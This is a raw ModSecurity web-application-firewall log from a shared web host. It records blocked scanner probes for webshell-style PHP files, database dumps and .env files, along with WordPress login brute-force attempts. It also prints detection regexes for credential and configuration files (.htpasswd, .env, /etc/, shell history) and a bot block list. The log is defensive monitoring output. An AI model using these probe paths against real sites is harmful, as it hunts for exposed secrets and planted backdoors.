[Tue May 26 16:13:04.517072 2026] [security2:error] [pid 782634:tid 782844] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5OP_P9qBfeb1w76Y6HwAAUEA"]
[Tue May 26 16:13:04.593178 2026] [security2:error] [pid 782634:tid 782841] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5OP_P9qBfeb1w76Y6FwAAAE0"]
[Tue May 26 16:13:04.603501 2026] [security2:error] [pid 782634:tid 782833] [client 20.205.111.246:3514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV5OP_P9qBfeb1w76Y6IgAAAEU"]
[Tue May 26 16:13:04.821707 2026] [security2:error] [pid 782634:tid 782845] [client 14.181.154.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5OP_P9qBfeb1w76Y6HgAAAFE"]
[Tue May 26 16:13:04.844305 2026] [security2:error] [pid 782634:tid 782883] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5OP_P9qBfeb1w76Y6KQAAd0Q"]
[Tue May 26 16:13:05.136474 2026] [security2:error] [pid 782634:tid 782793] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Of_P9qBfeb1w76Y6LQAAHUg"]
[Tue May 26 16:13:05.218109 2026] [security2:error] [pid 782634:tid 782884] [client 106.219.85.83:30543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Of_P9qBfeb1w76Y6MQAAAHg"]
[Tue May 26 16:13:05.218375 2026] [security2:error] [pid 782634:tid 782884] [client 106.219.85.83:30543] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Of_P9qBfeb1w76Y6MQAAAHg"]
[Tue May 26 16:13:05.283933 2026] [security2:error] [pid 782634:tid 782890] [client 20.205.111.246:3904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/ss.php"] [unique_id "ahV5Of_P9qBfeb1w76Y6OwAAAH4"]
[Tue May 26 16:13:05.939038 2026] [security2:error] [pid 782634:tid 782789] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Of_P9qBfeb1w76Y6RgAAGUo"]
[Tue May 26 16:13:05.999425 2026] [security2:error] [pid 782634:tid 782842] [client 20.205.111.246:2328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/sts.php"] [unique_id "ahV5Of_P9qBfeb1w76Y6RwAAAE4"]
[Tue May 26 16:13:06.229597 2026] [security2:error] [pid 782634:tid 782846] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Ov_P9qBfeb1w76Y6SwAAUlU"]
[Tue May 26 16:13:06.474408 2026] [security2:error] [pid 782634:tid 782715] [remote 94.76.235.103:41314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahV5Ov_P9qBfeb1w76Y6TwAAGlA"]
[Tue May 26 16:13:06.501945 2026] [security2:error] [pid 782634:tid 782820] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Ov_P9qBfeb1w76Y6UAAAOE0"]
[Tue May 26 16:13:06.752280 2026] [security2:error] [pid 782634:tid 782850] [client 20.205.111.246:3967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/shell.php"] [unique_id "ahV5Ov_P9qBfeb1w76Y6XwAAAFY"]
[Tue May 26 16:13:06.771962 2026] [security2:error] [pid 782634:tid 782852] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Ov_P9qBfeb1w76Y6XQAAWGE"]
[Tue May 26 16:13:07.076260 2026] [security2:error] [pid 782634:tid 782866] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5O__P9qBfeb1w76Y6YwAAZlM"]
[Tue May 26 16:13:07.084104 2026] [security2:error] [pid 782634:tid 782861] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Ov_P9qBfeb1w76Y6WgAAAGE"]
[Tue May 26 16:13:07.429112 2026] [security2:error] [pid 782634:tid 782862] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5O__P9qBfeb1w76Y6bAAAYlg"]
[Tue May 26 16:13:07.434123 2026] [security2:error] [pid 782634:tid 782792] [client 20.205.111.246:10725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/setup-config.php"] [unique_id "ahV5O__P9qBfeb1w76Y6cAAAABw"]
[Tue May 26 16:13:07.737278 2026] [security2:error] [pid 782634:tid 782807] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5O__P9qBfeb1w76Y6dwAAK1c"]
[Tue May 26 16:13:08.126902 2026] [security2:error] [pid 782634:tid 782800] [client 20.205.111.246:3949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV5PP_P9qBfeb1w76Y6fgAAACQ"]
[Tue May 26 16:13:08.225976 2026] [security2:error] [pid 782634:tid 782827] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5PP_P9qBfeb1w76Y6fwAAP1s"]
[Tue May 26 16:13:08.849921 2026] [security2:error] [pid 782634:tid 782875] [client 20.205.111.246:3950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahV5PP_P9qBfeb1w76Y6jAAAAG8"]
[Tue May 26 16:13:09.121596 2026] [security2:error] [pid 782634:tid 782870] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Pf_P9qBfeb1w76Y6mQAAal8"]
[Tue May 26 16:13:09.339426 2026] [security2:error] [pid 782634:tid 782821] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5PP_P9qBfeb1w76Y6kgAAADk"]
[Tue May 26 16:13:09.548355 2026] [security2:error] [pid 782634:tid 782886] [client 20.205.111.246:3485] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/ultra.php"] [unique_id "ahV5Pf_P9qBfeb1w76Y6pAAAAHo"]
[Tue May 26 16:13:10.301377 2026] [security2:error] [pid 782634:tid 782807] [client 20.205.111.246:2399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/vv.php"] [unique_id "ahV5Pv_P9qBfeb1w76Y6rwAAACs"]
[Tue May 26 16:13:10.711802 2026] [security2:error] [pid 782634:tid 782739] [remote 45.148.10.5:12882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/database.sql"] [unique_id "ahV5Pv_P9qBfeb1w76Y6vAAAXmg"]
[Tue May 26 16:13:10.873043 2026] [security2:error] [pid 782634:tid 782778] [client 68.183.88.172:50150] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "lmialumni.org"] [uri "/"] [unique_id "ahV5Pv_P9qBfeb1w76Y6wAAAAA4"]
[Tue May 26 16:13:11.035181 2026] [security2:error] [pid 782634:tid 782779] [client 20.205.111.246:1213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/V5.php"] [unique_id "ahV5P__P9qBfeb1w76Y6xQAAAA8"]
[Tue May 26 16:13:11.078153 2026] [security2:error] [pid 782634:tid 782742] [remote 45.148.10.5:12882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/dump.sql"] [unique_id "ahV5P__P9qBfeb1w76Y6yAAAVWs"]
[Tue May 26 16:13:11.203918 2026] [security2:error] [pid 782634:tid 782863] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Pv_P9qBfeb1w76Y6vwAAAGM"]
[Tue May 26 16:13:11.614982 2026] [security2:error] [pid 782634:tid 782743] [remote 45.148.10.5:12882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/backup.sql"] [unique_id "ahV5P__P9qBfeb1w76Y61gAASmw"]
[Tue May 26 16:13:11.699406 2026] [security2:error] [pid 782634:tid 782866] [client 20.205.111.246:4677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wp-user.php"] [unique_id "ahV5P__P9qBfeb1w76Y61wAAAGY"]
[Tue May 26 16:13:12.427938 2026] [security2:error] [pid 782634:tid 782772] [client 20.205.111.246:9162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahV5QP_P9qBfeb1w76Y65wAAAAg"]
[Tue May 26 16:13:12.557028 2026] [security2:error] [pid 782634:tid 782748] [remote 45.148.10.5:12882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/db.sql"] [unique_id "ahV5QP_P9qBfeb1w76Y66wAABHE"]
[Tue May 26 16:13:12.671795 2026] [security2:error] [pid 782634:tid 782832] [client 196.119.67.174:53118] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodavionics.com"] [uri "/.env"] [unique_id "ahV5QP_P9qBfeb1w76Y68wAAAEQ"]
[Tue May 26 16:13:12.816296 2026] [security2:error] [pid 782634:tid 782749] [remote 47.251.53.97:49438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahV5QP_P9qBfeb1w76Y67AAAHnI"]
[Tue May 26 16:13:13.130974 2026] [security2:error] [pid 782634:tid 782781] [client 20.205.111.246:3466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV5Qf_P9qBfeb1w76Y6-AAAABE"]
[Tue May 26 16:13:13.278424 2026] [security2:error] [pid 782634:tid 782836] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5QP_P9qBfeb1w76Y69wAAAEg"]
[Tue May 26 16:13:13.294115 2026] [security2:error] [pid 782634:tid 782857] [client 196.119.67.174:53145] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodbalsa.com"] [uri "/.env"] [unique_id "ahV5Qf_P9qBfeb1w76Y7AgAAAF0"]
[Tue May 26 16:13:13.804495 2026] [security2:error] [pid 782634:tid 782860] [client 20.205.111.246:2347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/worksec.php"] [unique_id "ahV5Qf_P9qBfeb1w76Y7CQAAAGA"]
[Tue May 26 16:13:13.914961 2026] [security2:error] [pid 782634:tid 782830] [client 196.119.67.174:53167] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "glorodrc.com"] [uri "/.env"] [unique_id "ahV5Qf_P9qBfeb1w76Y7CgAAAEI"]
[Tue May 26 16:13:14.459515 2026] [security2:error] [pid 782634:tid 782866] [client 20.205.111.246:4133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wp-themes.php"] [unique_id "ahV5Qv_P9qBfeb1w76Y7FAAAAGY"]
[Tue May 26 16:13:15.182153 2026] [security2:error] [pid 782634:tid 782881] [client 20.205.111.246:8321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wp-signin.php"] [unique_id "ahV5Q__P9qBfeb1w76Y7JAAAAHU"]
[Tue May 26 16:13:15.302680 2026] [security2:error] [pid 782634:tid 782868] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Qv_P9qBfeb1w76Y7IwAAAGg"]
[Tue May 26 16:13:15.534116 2026] [security2:error] [pid 782634:tid 782829] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Q__P9qBfeb1w76Y7MQAAQXM"]
[Tue May 26 16:13:15.763455 2026] [security2:error] [pid 782634:tid 782775] [client 106.219.85.83:33121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Q__P9qBfeb1w76Y7MwAAAAs"]
[Tue May 26 16:13:15.763738 2026] [security2:error] [pid 782634:tid 782775] [client 106.219.85.83:33121] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Q__P9qBfeb1w76Y7MwAAAAs"]
[Tue May 26 16:13:15.850797 2026] [security2:error] [pid 782634:tid 782762] [remote 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Q__P9qBfeb1w76Y7OQAAEX8"]
[Tue May 26 16:13:15.866526 2026] [security2:error] [pid 782634:tid 782837] [client 112.86.225.236:59434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahV5Q__P9qBfeb1w76Y7OwAAAEk"]
[Tue May 26 16:13:15.866648 2026] [security2:error] [pid 782634:tid 782837] [client 112.86.225.236:59434] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahV5Q__P9qBfeb1w76Y7OwAAAEk"]
[Tue May 26 16:13:15.912440 2026] [security2:error] [pid 782634:tid 782778] [client 20.205.111.246:12703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wp-blog-header.php"] [unique_id "ahV5Q__P9qBfeb1w76Y7PAAAAA4"]
[Tue May 26 16:13:16.325424 2026] [security2:error] [pid 782634:tid 782875] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5RP_P9qBfeb1w76Y7TAAAb3k"]
[Tue May 26 16:13:16.611600 2026] [security2:error] [pid 782634:tid 782874] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5RP_P9qBfeb1w76Y7VQAAbgg"]
[Tue May 26 16:13:16.833344 2026] [security2:error] [pid 782634:tid 782876] [client 20.205.111.246:2429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahV5RP_P9qBfeb1w76Y7WgAAAHA"]
[Tue May 26 16:13:16.928031 2026] [security2:error] [pid 782634:tid 782877] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5RP_P9qBfeb1w76Y7WwAAcQc"]
[Tue May 26 16:13:17.225592 2026] [security2:error] [pid 782634:tid 782789] [client 45.148.10.5:12882] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Rf_P9qBfeb1w76Y7aQAAGRA"]
[Tue May 26 16:13:17.521095 2026] [security2:error] [pid 782634:tid 782878] [client 20.205.111.246:7161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/wsa.php"] [unique_id "ahV5Rf_P9qBfeb1w76Y7cAAAAHI"]
